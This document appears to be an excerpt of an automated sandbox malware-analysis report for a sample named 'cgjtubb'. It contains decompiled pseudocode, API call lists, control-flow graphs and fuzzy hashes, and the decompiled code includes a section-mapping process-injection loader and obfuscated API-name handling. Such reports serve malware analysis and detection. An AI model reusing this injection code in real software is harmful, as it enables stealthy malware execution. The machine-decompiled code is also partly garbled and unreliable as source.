									_t201 =  *(_t202 - 0x44);
									 *((intOrPtr*)(_t128 + 0x20))(_t175, _t201, 0x104);
									 *((intOrPtr*)(_t201 + 0x208)) =  *((intOrPtr*)(_t202 + 0x14));
									 *(_t202 - 8) =  *(_t202 - 8) + 1;
								}
							}
						}
						_t100 = _t202 - 0x50;
						 *(_t100 + 4) = _t175;
						 *_t100 =  *((intOrPtr*)(_t202 + 0x10)) + 0x10000;
						_t188 = _t202 - 0x58;
						if(NtCreateSection(_t188, 0xe, _t175, _t100, 0x40, 0x8000000, _t175) == 0 &&  *(_t202 - 8) != 0) {
							 *_t46 =  *(_t202 - 0x50);
							_t102 = _t202 - 0x48;
							 *_t102 = _t175;
							if(NtMapViewOfSection( *_t188, 0xffffffff, _t102, _t175, _t175, _t175, _t202 - 0x38, 1, _t175, 4) == 0) {
								_t104 = _t202 - 0x40;
								 *_t104 = _t175;
								_t224 = NtMapViewOfSection( *_t188,  *(_t202 - 0xc), _t104, _t175, _t175, _t175, _t202 - 0x38, 1, _t175, 0x20);
								if(_t224 == 0) {
									L16();
									if(_t224 == 0 && _t224 != 0) {
									}
									_t207 = _t204 + 4;
									_push(0x2e62);
									_t208 = _t207 + 4;
									_push(0x2260);
									_t106 =  *_t208;
									_t209 = _t208 + 4;
									_t160 = (0x2260 << 5) + _t106;
									asm("lodsb");
									_t161 = _t160;
									asm("loop 0xffffffc2");
									_t162 = _t161 ^ 0xbcc951dd;
									_t204 = _t209 - _t162;
									_t193 =  *((intOrPtr*)(_t202 + 0xc)) +  *((intOrPtr*)( *((intOrPtr*)(_t202 + 0xc))));
									_t139 =  *(_t193 + 6) & 0x0000ffff;
									_push(_t193);
									_t163 = _t193;
									if( *((intOrPtr*)(_t202 - 0x34)) == 0) {
										_t164 = _t163 + 0xf8;
										__eflags = _t164;
									} else {
										_t164 = _t163 + 0x108;
									}
									_push(_t139);
									_t140 =  *(_t164 + 0x10);
									if(_t140 != 0) {
										memcpy( *((intOrPtr*)(_t164 + 0xc)) +  *(_t202 - 0x48),  *((intOrPtr*)(_t164 + 0x14)) +  *((intOrPtr*)(_t202 + 0xc)), _t140);
										_t204 = _t204 + 0xc;
									}
									asm("loop 0xffffffe6");
									_pop(_t194);
									_t229 =  *((intOrPtr*)(_t202 - 0x34));
									if( *((intOrPtr*)(_t202 - 0x34)) == 0) {
										_push(_t194);
										_t167 =  *((intOrPtr*)(_t194 + 0x34)) -  *(_t202 - 0x40);
										_t197 =  *((intOrPtr*)(_t194 + 0xa0)) +  *(_t202 - 0x48);
										__eflags = _t197;
										while(1) {
											__eflags =  *_t197;
											if( *_t197 == 0) {
												break;
											}
											_t177 =  *_t197;
											_t197 = _t197 + 8;
											asm("lodsw");
											__eflags = 0;
											if(0 != 0) {
												 *((intOrPtr*)(0)) =  *((intOrPtr*)(0)) - _t167;
												__eflags =  *((intOrPtr*)(0 +  *(_t202 - 0x48) + _t177));
											}
											asm("loop 0xffffffe9");
										}
										_pop(_t198);
										_t175 = 0;
										__eflags = 0;
										_t108 = _t202 - 4;
										 *_t108 = 0;
										 *((intOrPtr*)(_t128 + 0x98))( *(_t202 - 0xc), 0, 0, 0, 0, 0,  *((intOrPtr*)(_t198 + 0x28)) +  *(_t202 - 0x40),  *(_t202 - 0x3c), _t108, 0);
									} else {
										L49();
										_pop(_t178);
										_t175 = _t178 - 0x1760;
										 *((intOrPtr*)(_t175 + 0x1794)) = _t175 + 0x2c17;
										L00401227(_t128, _t175, _t229, _t175 + 0x2c17, 0x1ad);
										0x33();
										 *((intOrPtr*)(_t175 + 0x17b9)) = _t175 + 0x2c67;
										0x33();
									}
								}
							}
						}
					}
				}
				_t91 = 0x14e3;
				_push(0x37f);
				_t131 =  *_t204;
				return L0040119E(_t91, _t131, _t175, _t229);
			}












































                                                          0x004014de
                                                          0x004014e3
                                                          0x004014e6
                                                          0x004014e8
                                                          0x004014f1
                                                          0x004014f3
                                                          0x004014f3
                                                          0x004014f6
                                                          0x004014f6
                                                          0x004014fb
                                                          0x00000000
                                                          0x00000000
                                                          0x00401829
                                                          0x00401829
                                                          0x00401501
                                                          0x00401504
                                                          0x00401507
                                                          0x0040150b
                                                          0x0040150e
                                                          0x00401512
                                                          0x00401518
                                                          0x0040151b
                                                          0x0040151d
                                                          0x00401520
                                                          0x00401526
                                                          0x00401529
                                                          0x00401537
                                                          0x00401538
                                                          0x00401539
                                                          0x0040153b
                                                          0x00401541
                                                          0x00401564
                                                          0x00401567
                                                          0x0040156a
                                                          0x0040156d
                                                          0x00401573
                                                          0x00401588
                                                          0x0040158d
                                                          0x00401590
                                                          0x00401593
                                                          0x004015ab
                                                          0x004015ad
                                                          0x004015b0
                                                          0x004015c9
                                                          0x004015cb
                                                          0x004015d5
                                                          0x004015db
                                                          0x004015e1
                                                          0x004015e1
                                                          0x004015c9
                                                          0x004015ab
                                                          0x004015e4
                                                          0x004015f0
                                                          0x004015f3
                                                          0x004015f5
                                                          0x0040160a
                                                          0x0040161d
                                                          0x00401620
                                                          0x00401623
                                                          0x0040163b
                                                          0x00401641
                                                          0x00401644
                                                          0x0040165b
                                                          0x0040165d
                                                          0x00401663
                                                          0x00401668
                                                          0x00401668
                                                          0x00401672
                                                          0x00401699
                                                          0x004016a1
                                                          0x004016c5
                                                          0x004016c6
                                                          0x004016c9
                                                          0x004016e1
                                                          0x004016f0
                                                          0x004016f8
                                                          0x004016fd
                                                          0x00401706
                                                          0x0040170f
                                                          0x0040171b
                                                          0x0040171d
                                                          0x00401721
                                                          0x00401722
                                                          0x00401728
                                                          0x00401732
                                                          0x00401732
                                                          0x0040172a
                                                          0x0040172a
                                                          0x0040172a
                                                          0x00401738
                                                          0x00401739
                                                          0x0040173e
                                                          0x0040174c
                                                          0x0040174c
                                                          0x0040174c
                                                          0x00401752
                                                          0x00401754
                                                          0x00401755
                                                          0x00401759
                                                          0x004017c1
                                                          0x004017c5
                                                          0x004017d0
                                                          0x004017d0
                                                          0x004017d3
                                                          0x004017d3
                                                          0x004017d6
                                                          0x00000000
                                                          0x00000000
                                                          0x004017d8
                                                          0x004017e2
                                                          0x004017e7
                                                          0x004017e9
                                                          0x004017ee
                                                          0x004017fa
                                                          0x004017fa
                                                          0x004017fa
                                                          0x004017fc
                                                          0x004017fc
                                                          0x00401800
                                                          0x00401807
                                                          0x00401807
                                                          0x00401809
                                                          0x0040180c
                                                          0x0040181c
                                                          0x0040175b
                                                          0x0040175b
                                                          0x00401760
                                                          0x00401761
                                                          0x00401777
                                                          0x00401786
                                                          0x00401793
                                                          0x004017aa
                                                          0x004017b8
                                                          0x004017b8
                                                          0x00401759
                                                          0x0040165d
                                                          0x0040163b
                                                          0x0040160a
                                                          0x00401541
                                                          0x0040183d
                                                          0x0040184b
                                                          0x00401850
                                                          0x00401866

                                                          APIs
                                                          • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,?,?,00000002), ref: 00401556
                                                          • NtCreateSection.NTDLL(?,00000006,?,?,00000004,08000000,?,?,?,00000002), ref: 00401583
                                                          • NtMapViewOfSection.NTDLL(?,000000FF,?,?,?,?,00000000,00000001,?,00000004,?,?,?,00000004,08000000), ref: 004015A6
                                                          • NtMapViewOfSection.NTDLL(?,?,?,?,?,?,00000000,00000001,?,00000004,?,?,?,00000000,00000001), ref: 004015C4
                                                          • NtCreateSection.NTDLL(?,0000000E,?,?,00000040,08000000,?,?,?,00000004,08000000,?,?,?,00000002), ref: 00401605
                                                          • NtMapViewOfSection.NTDLL(?,000000FF,?,?,?,?,00000000,00000001,?,00000004,?,?,?,00000040,08000000), ref: 00401636
                                                          • NtMapViewOfSection.NTDLL(?,?,?,?,?,?,00000000,00000001,?,00000020,?,?,?,00000000,00000001), ref: 00401658
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.430379965.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_400000_cgjtubb.jbxd
                                                          Similarity
                                                          • API ID: Section$View$Create$DuplicateObject
                                                          • String ID:
                                                          • API String ID: 1546783058-0
                                                          • Opcode ID: c7ae0998d8d661ccf688133248b2e1d84d0a8d2d586b58feb6ff111a8af814fa
                                                          • Instruction ID: c414ae2dcce1999d5ff69eab83f34e0e1241aa209a2fbae03b06ced14e898130
                                                          • Opcode Fuzzy Hash: c7ae0998d8d661ccf688133248b2e1d84d0a8d2d586b58feb6ff111a8af814fa
                                                          • Instruction Fuzzy Hash: 085106B1900249BFEF219F91CC48FEFBBB9EF85B10F104119FA11AA2A5D7709940CB60
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0047003C Relevance: 11.0, APIs: 4, Strings: 2, Instructions: 515memoryCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 0 47003c-470047 1 47004c-470263 call 470a3f call 470e0f call 470d90 VirtualAlloc 0->1 2 470049 0->2 17 470265-470289 call 470a69 1->17 18 47028b-470292 1->18 2->1 23 4702ce-4703c2 VirtualProtect call 470cce call 470ce7 17->23 19 4702a1-4702b0 18->19 22 4702b2-4702cc 19->22 19->23 22->19 29 4703d1-4703e0 23->29 30 4703e2-470437 call 470ce7 29->30 31 470439-4704b8 VirtualFree 29->31 30->29 32 4705f4-4705fe 31->32 33 4704be-4704cd 31->33 36 470604-47060d 32->36 37 47077f-470789 32->37 35 4704d3-4704dd 33->35 35->32 39 4704e3-470505 35->39 36->37 42 470613-470637 36->42 40 4707a6-4707b0 37->40 41 47078b-4707a3 37->41 51 470517-470520 39->51 52 470507-470515 39->52 44 4707b6-4707cb 40->44 45 47086e-4708be LoadLibraryA 40->45 41->40 46 47063e-470648 42->46 48 4707d2-4707d5 44->48 50 4708c7-4708f9 45->50 46->37 49 47064e-47065a 46->49 53 4707d7-4707e0 48->53 54 470824-470833 48->54 49->37 55 470660-47066a 49->55 56 470902-47091d 50->56 57 4708fb-470901 50->57 58 470526-470547 51->58 52->58 59 4707e4-470822 53->59 60 4707e2 53->60 62 470839-47083c 54->62 61 47067a-470689 55->61 57->56 63 47054d-470550 58->63 59->48 60->54 64 470750-47077a 61->64 65 47068f-4706b2 61->65 62->45 66 47083e-470847 62->66 68 470556-47056b 63->68 69 4705e0-4705ef 63->69 64->46 70 4706b4-4706ed 65->70 71 4706ef-4706fc 65->71 72 47084b-47086c 66->72 73 470849 66->73 74 47056f-47057a 68->74 75 47056d 68->75 69->35 70->71 76 4706fe-470748 71->76 77 47074b 71->77 72->62 73->45 80 47057c-470599 74->80 81 47059b-4705bb 74->81 75->69 76->77 77->61 84 4705bd-4705db 80->84 81->84 84->63
                                                          APIs
                                                          • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 0047024D
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.430978664.0000000000470000.00000040.00001000.00020000.00000000.sdmp, Offset: 00470000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_470000_cgjtubb.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: AllocVirtual
                                                          • String ID: cess$kernel32.dll
                                                          • API String ID: 4275171209-1230238691
                                                          • Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                          • Instruction ID: 16711ddd22fd0413336594a03f00dbfaf066cf36866d812deba6f11f0119f937
                                                          • Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                          • Instruction Fuzzy Hash: 8D527974A01229DFDB64CF68C984BA9BBB1BF09304F1480DAE50DAB351DB34AE85DF15
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00470E0F Relevance: 3.0, APIs: 2, Instructions: 15COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 358 470e0f-470e24 SetErrorMode * 2 359 470e26 358->359 360 470e2b-470e2c 358->360 359->360
                                                          APIs
                                                          • SetErrorMode.KERNELBASE(00000400,?,?,00470223,?,?), ref: 00470E19
                                                          • SetErrorMode.KERNELBASE(00000000,?,?,00470223,?,?), ref: 00470E1E
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.430978664.0000000000470000.00000040.00001000.00020000.00000000.sdmp, Offset: 00470000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_470000_cgjtubb.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ErrorMode
                                                          • String ID:
                                                          • API String ID: 2340568224-0
                                                          • Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                          • Instruction ID: 6b214e80103007eca947940ca629b0f77f36c1fcc8e570edb97f76d7bdc3c18d
                                                          • Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                          • Instruction Fuzzy Hash: 28D01231145128B7D7002A94DC09BCE7B1CDF09B62F008411FB0DD9180C774994046E9
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00401869 Relevance: 1.3, APIs: 1, Instructions: 52sleepCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 361 401869-4018bd call 40119e Sleep call 4013d8 372 4018cc-401907 call 40119e 361->372 373 4018bf-4018c7 call 4014a8 361->373 373->372
                                                          C-Code - Quality: 62%
                                                          			E00401869(void* __eflags, intOrPtr* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				char _v8;
				void* __edi;
				void* __ebp;
				intOrPtr _t8;
				void* _t11;
				intOrPtr _t13;
				intOrPtr* _t16;
				signed char _t19;
				void* _t20;
				intOrPtr* _t21;
				intOrPtr* _t22;

				_t24 = __eflags;
				_push(0x18a0);
				_t8 =  *_t21;
				_t22 = _t21 + 4;
				L0040119E(_t8, 0x63, _t20, __eflags);
				_t16 = _a4;
				Sleep(0x1388);
				_t11 = E004013D8(_t19, _t24, _t16, _a8, _a12,  &_v8); // executed
				_t25 = _t11;
				if(_t11 != 0) {
					E004014A8(_t25, _t16, _t11, _v8, _a16); // executed
				}
				 *_t16(0xffffffff, 0);
				_push(0x18a0);
				_t13 =  *_t22;
				return L0040119E(_t13, 0x63, _t20, _t25);
			}














                                                          0x00401869
                                                          0x00401877
                                                          0x0040187c
                                                          0x0040187f
                                                          0x0040189b
                                                          0x004018a0
                                                          0x004018a8
                                                          0x004018b6
                                                          0x004018bb
                                                          0x004018bd
                                                          0x004018c7
                                                          0x004018c7
                                                          0x004018d0
                                                          0x004018d9
                                                          0x004018de
                                                          0x00401907

                                                          APIs
                                                          • Sleep.KERNELBASE(00001388), ref: 004018A8
                                                            • Part of subcall function 004014A8: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,?,?,00000002), ref: 00401556
                                                            • Part of subcall function 004014A8: NtCreateSection.NTDLL(?,00000006,?,?,00000004,08000000,?,?,?,00000002), ref: 00401583
                                                            • Part of subcall function 004014A8: NtMapViewOfSection.NTDLL(?,000000FF,?,?,?,?,00000000,00000001,?,00000004,?,?,?,00000004,08000000), ref: 004015A6
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.430379965.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_400000_cgjtubb.jbxd
                                                          Similarity
                                                          • API ID: Section$CreateDuplicateObjectSleepView
                                                          • String ID:
                                                          • API String ID: 1885482327-0
                                                          • Opcode ID: 0e3b0a6706bab068868f47a51e5f7c8c9e7b56fc4d9aa96bcc056c135368eafa
                                                          • Instruction ID: 60862f2667b59bfd2b53fd736c2ec37b6a52218a42a16e6e58fdf04961db7cc8
                                                          • Opcode Fuzzy Hash: 0e3b0a6706bab068868f47a51e5f7c8c9e7b56fc4d9aa96bcc056c135368eafa
                                                          • Instruction Fuzzy Hash: 79015E37608204E7E7007A95DC8197A37699B45354F208137BA13791E1D63D9B12A76B
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0040188B Relevance: 1.3, APIs: 1, Instructions: 40sleepCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 384 40188b-4018bd call 40119e Sleep call 4013d8 391 4018cc-401907 call 40119e 384->391 392 4018bf-4018c7 call 4014a8 384->392 392->391
                                                          C-Code - Quality: 62%
                                                          			E0040188B(signed char __eax, void* __ebx, void* __edx, void* __edi, void* __eflags) {
				void* _t13;
				intOrPtr _t15;
				intOrPtr* _t19;
				signed char _t24;
				void* _t28;
				intOrPtr* _t30;

				_t33 = __eflags;
				_t25 = __edi;
				asm("out 0xdc, al");
				_t24 = __eax;
				L0040119E(__edx, 0x63, __edi, __eflags);
				_t19 =  *((intOrPtr*)(_t28 + 8));
				Sleep(0x1388);
				_t13 = E004013D8(_t24, _t33, _t19,  *((intOrPtr*)(_t28 + 0xc)),  *((intOrPtr*)(_t28 + 0x10)), _t28 - 4); // executed
				_t34 = _t13;
				if(_t13 != 0) {
					E004014A8(_t34, _t19, _t13,  *((intOrPtr*)(_t28 - 4)),  *((intOrPtr*)(_t28 + 0x14))); // executed
				}
				 *_t19(0xffffffff, 0);
				_push(0x18a0);
				_t15 =  *_t30;
				return L0040119E(_t15, 0x63, _t25, _t34);
			}









                                                          0x0040188b
                                                          0x0040188b
                                                          0x0040188b
                                                          0x0040188e
                                                          0x0040189b
                                                          0x004018a0
                                                          0x004018a8
                                                          0x004018b6
                                                          0x004018bb
                                                          0x004018bd
                                                          0x004018c7
                                                          0x004018c7
                                                          0x004018d0
                                                          0x004018d9
                                                          0x004018de
                                                          0x00401907

                                                          APIs
                                                          • Sleep.KERNELBASE(00001388), ref: 004018A8
                                                            • Part of subcall function 004014A8: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,?,?,00000002), ref: 00401556
                                                            • Part of subcall function 004014A8: NtCreateSection.NTDLL(?,00000006,?,?,00000004,08000000,?,?,?,00000002), ref: 00401583
                                                            • Part of subcall function 004014A8: NtMapViewOfSection.NTDLL(?,000000FF,?,?,?,?,00000000,00000001,?,00000004,?,?,?,00000004,08000000), ref: 004015A6
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.430379965.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_400000_cgjtubb.jbxd
                                                          Similarity
                                                          • API ID: Section$CreateDuplicateObjectSleepView
                                                          • String ID:
                                                          • API String ID: 1885482327-0
                                                          • Opcode ID: b2204d64e98a2de913c841e3b248d85559c76b61fbb623d473913d92bf580395
                                                          • Instruction ID: a729e010e1eaefc24d003010d97dd2b43a4c6b95cafc309fd02eabc3c929d3cf
                                                          • Opcode Fuzzy Hash: b2204d64e98a2de913c841e3b248d85559c76b61fbb623d473913d92bf580395
                                                          • Instruction Fuzzy Hash: 7AF04F37704205EBDB00BA95DC81A6E3769DF44315F20803BB612B91F1C63D8B12A76B
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0040189A Relevance: 1.3, APIs: 1, Instructions: 37sleepCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 403 40189a-4018bd call 40119e Sleep call 4013d8 409 4018cc-401907 call 40119e 403->409 410 4018bf-4018c7 call 4014a8 403->410 410->409
                                                          C-Code - Quality: 61%
                                                          			E0040189A(void* __ebx, void* __ecx, void* __edi, void* __eflags) {
				void* _t8;
				void* _t11;
				intOrPtr _t13;
				intOrPtr* _t17;
				signed char _t21;
				void* _t25;
				intOrPtr* _t27;

				_t30 = __eflags;
				_t22 = __edi;
				_pop(ds);
				L0040119E(_t8, __ecx, __edi, __eflags);
				_t17 =  *((intOrPtr*)(_t25 + 8));
				Sleep(0x1388);
				_t11 = E004013D8(_t21, _t30, _t17,  *((intOrPtr*)(_t25 + 0xc)),  *((intOrPtr*)(_t25 + 0x10)), _t25 - 4); // executed
				_t31 = _t11;
				if(_t11 != 0) {
					E004014A8(_t31, _t17, _t11,  *((intOrPtr*)(_t25 - 4)),  *((intOrPtr*)(_t25 + 0x14))); // executed
				}
				 *_t17(0xffffffff, 0);
				_push(0x18a0);
				_t13 =  *_t27;
				return L0040119E(_t13, 0x63, _t22, _t31);
			}










                                                          0x0040189a
                                                          0x0040189a
                                                          0x0040189a
                                                          0x0040189b
                                                          0x004018a0
                                                          0x004018a8
                                                          0x004018b6
                                                          0x004018bb
                                                          0x004018bd
                                                          0x004018c7
                                                          0x004018c7
                                                          0x004018d0
                                                          0x004018d9
                                                          0x004018de
                                                          0x00401907

                                                          APIs
                                                          • Sleep.KERNELBASE(00001388), ref: 004018A8
                                                            • Part of subcall function 004014A8: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,?,?,00000002), ref: 00401556
                                                            • Part of subcall function 004014A8: NtCreateSection.NTDLL(?,00000006,?,?,00000004,08000000,?,?,?,00000002), ref: 00401583
                                                            • Part of subcall function 004014A8: NtMapViewOfSection.NTDLL(?,000000FF,?,?,?,?,00000000,00000001,?,00000004,?,?,?,00000004,08000000), ref: 004015A6
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.430379965.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_400000_cgjtubb.jbxd
                                                          Similarity
                                                          • API ID: Section$CreateDuplicateObjectSleepView
                                                          • String ID:
                                                          • API String ID: 1885482327-0
                                                          • Opcode ID: acd5664999f289340f50b25abb29b7ad2467a3a024473d975d06bf1365dd1af9
                                                          • Instruction ID: fa21e6fe5ec55b494b8a61ead8be6eb3dfa9bfc2d8f44280934193d3a60a32fd
                                                          • Opcode Fuzzy Hash: acd5664999f289340f50b25abb29b7ad2467a3a024473d975d06bf1365dd1af9
                                                          • Instruction Fuzzy Hash: B3F01D37604205EBDB00BA95DC819AE3769AF04315F20843BBA12B90E1C6398B12A72B
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Non-executed Functions

                                                          Function 0040D3F8 Relevance: 6.0, APIs: 4, Instructions: 49COMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.430487602.0000000000409000.00000020.00000001.01000000.00000007.sdmp, Offset: 00409000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_409000_cgjtubb.jbxd
                                                          Similarity
                                                          • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                          • String ID:
                                                          • API String ID: 3016257755-0
                                                          • Opcode ID: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
                                                          • Instruction ID: 0919a159efc3dc78a400a241d7d35c155fcddafca829aeb5adc2301147472416
                                                          • Opcode Fuzzy Hash: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
                                                          • Instruction Fuzzy Hash: A811803284014EBBCF165FD4CC51CEE3F22FB59354B58842AFE1869171C23AD9B5AB86
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Execution Graph

                                                          Execution Coverage:1%
                                                          Dynamic/Decrypted Code Coverage:0%
                                                          Signature Coverage:0%
                                                          Total number of Nodes:21
                                                          Total number of Limit Nodes:3
                                                          execution_graph 17268 506bc0 17269 506bc4 17268->17269 17270 506bc7 malloc 17268->17270 17249 469a47 17250 469a4c LoadLibraryA 17249->17250 17252 4b298d 17255 4b29b5 FindCloseChangeNotification 17252->17255 17256 4b2b44 GetLastError 17252->17256 17255->17256 17257 4b2e24 17256->17257 17258 469f68 17259 46a007 17258->17259 17260 46a018 LoadLibraryA 17258->17260 17259->17260 17271 50492e 17272 50496b ExitProcess 17271->17272 17273 50493d 17271->17273 17273->17272 17261 4b1464 17262 4b1477 17261->17262 17265 4afeef 17262->17265 17264 4b1540 17266 4aff0f 17265->17266 17267 4aff20 CharUpperBuffA 17266->17267 17267->17264

                                                          Executed Functions

                                                          Function 004B298D Relevance: 26.5, APIs: 2, Strings: 13, Instructions: 248COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 0 4b298d-4b29af 1 4b2b95-4b2bff 0->1 2 4b29b5-4b29dd 0->2 3 4b2dba-4b2ddf 1->3 4 4b2c05-4b2c1d 1->4 5 4b2a0a-4b2a16 2->5 6 4b29df-4b2a03 2->6 9 4b2df1-4b2e22 GetLastError 3->9 10 4b2de1-4b2de7 3->10 4->3 7 4b2a3b-4b2a72 5->7 8 4b2a18-4b2a34 5->8 6->5 13 4b2ac6-4b2acc 7->13 14 4b2a74-4b2a76 7->14 8->7 11 4b2e53-4b2e87 9->11 12 4b2e24-4b2e4c 9->12 15 4b2de9 10->15 16 4b2dee 10->16 17 4b2e89-4b2e8f 11->17 18 4b2e91-4b2ecd call 4b009d 11->18 12->11 21 4b2ace-4b2b07 13->21 22 4b2b0d-4b2b42 FindCloseChangeNotification 13->22 19 4b2a78-4b2aa1 14->19 20 4b2ab1-4b2ac0 14->20 15->16 16->9 17->18 32 4b2ed2 18->32 24 4b2ac3 19->24 25 4b2aa3-4b2aaf 19->25 20->24 21->22 26 4b2b68 22->26 27 4b2b44-4b2b62 22->27 24->13 25->20 29 4b2b6b-4b2b83 26->29 27->29 30 4b2b64-4b2b66 27->30 31 4b2b89-4b2b90 29->31 30->26 30->31 31->3 32->32
                                                          C-Code - Quality: 53%
                                                          			E004B298D(intOrPtr __ebx, void* __ecx, signed int __edx, signed int __esi) {
				int _t71;
				int _t82;
				long _t84;
				char* _t85;
				int _t87;
				int _t89;
				int _t99;
				int _t102;
				char* _t104;
				int _t105;
				char* _t107;
				char* _t118;
				signed int _t127;
				void* _t129;
				void* _t132;
				void* _t147;
				short _t153;
				intOrPtr _t164;
				void* _t165;
				intOrPtr _t167;
				void* _t188;
				void* _t191;

				_t187 = __esi;
				_t170 = __edx;
				 *(_t191 - 0x10) =  *(_t191 - 0x10) - __ebx;
				 *((intOrPtr*)(_t191 - 0x14)) = __ebx;
				_t153 = __ecx - 0x602e;
				 *((intOrPtr*)(_t191 - 0xc)) = __ebx;
				_t71 =  *(_t191 - 8);
				if( *((intOrPtr*)(_t191 - 0x40)) == 0xffffffff) {
					 *(_t191 - 8) = _t71;
					 *0x50813e = _t153;
					 *(_t191 - 0x10) = "WindowsCodecs.dll";
					_t118 = 0x3cb383;
					_t82 =  *(_t191 - 8);
					if( *(_t191 - 0x44) != 0x20) {
						L21:
						 *0x5081d6 =  *0x5081d6 - 0x85cb;
						 *(_t191 - 8) = _t82;
						if(_t82 < 0x2057) {
							if(_t118 != 0x39) {
								_t118 = "api-ms-win-core-rtlsupport-l1-1-0.dll";
							}
						}
						_t156 = 0x674c;
						 *0x5081a6 = 0x674c;
						_t177 = 0x871324;
						_t84 = GetLastError();
						 *0x5081f4 = 0x871324;
						 *(_t191 - 8) = _t84;
						_t85 = "wmi.dll";
						if(_t118 == 0x25f343) {
							_t118 = "LookupPrivilegeValueA";
							_t156 = 0xe16f;
							_t177 =  *0x5081fa; // 0x8a34
						}
						 *0x50afe1 = _t85;
						_t188 = _t187 + 0xc800;
						 *0x50afe5 = 0;
						_t87 =  *(_t191 - 8);
						 *(_t191 - 8) = _t87;
						 *(_t191 - 8) = _t87;
						_t89 =  *(_t191 - 8);
						 *(_t191 - 0x44) = _t89;
						if((_t177 - 0x0000009d & 0x000000a5) == 0) {
							 *0x509dc3 =  *0x509dc3 - _t188;
						}
						 *(_t191 - 8) = _t89;
						E004B009D(_t89, 0, _t156, _t89, _t89, _t89);
						 *(_t191 - 0x10) =  &(( *(_t191 - 0x10))[0x36e765]);
						 *((intOrPtr*)(_t191 - 0xc)) =  *((intOrPtr*)(_t191 - 0xc)) + 0x22a07e;
						 *(_t191 - 0x10) = 0x36e765;
						 *0x508136 =  *0x508136 + _t156;
						_push(0x4b2ed4);
						goto __ecx;
					}
					 *0x50afe1 = _t82;
					 *(_t191 - 8) = _t82;
					_push(_t82);
					_push(_t82);
					_push(_t82);
					_push(E004B2C1E);
					_push(L004ADFCC);
					return _t82;
				}
				_t127 =  *0x50afe6; // -97
				 *0x50853b = _t71;
				 *(_t191 - 8) = _t71;
				_t129 =  !_t127 +  !_t127;
				if(_t129 > 0x350e) {
					 *((intOrPtr*)(_t191 - 0x14)) =  *((intOrPtr*)(_t191 - 0x14)) - _t129;
					 *0x508116 = _t153;
					_t153 = 0x6c3e;
					 *0x5081b8 = __edx;
					_t170 = __edx + 0x9e;
					 *0x508238 = __esi;
				}
				_t187 = 0;
				_t99 =  *(_t191 - 8);
				if(_t99 >= 0x168f) {
					 *(_t191 - 0x10) =  &(( *(_t191 - 0x10))[(char*)("xmllite.dll")]);
					_t153 =  *0x5081a0; // 0xea90
				}
				 *(_t191 - 8) = _t99;
				_t132 =  *(_t191 - 0x10) - 0x48;
				_t102 =  *(_t191 - 8);
				_t164 =  *0x50816e; // 0xfe20
				_t165 = _t164 + 1;
				_push( *((intOrPtr*)(_t191 - 0x40)));
				 *0x50afd8 =  *0x50afd8 + _t102;
				 *(_t191 - 8) = _t102;
				_t104 =  *(_t191 - 8);
				if(_t132 > 0x3a) {
					L11:
					if(_t104 != 0x17fba1) {
						_t165 = _t165 - 0x5eb238;
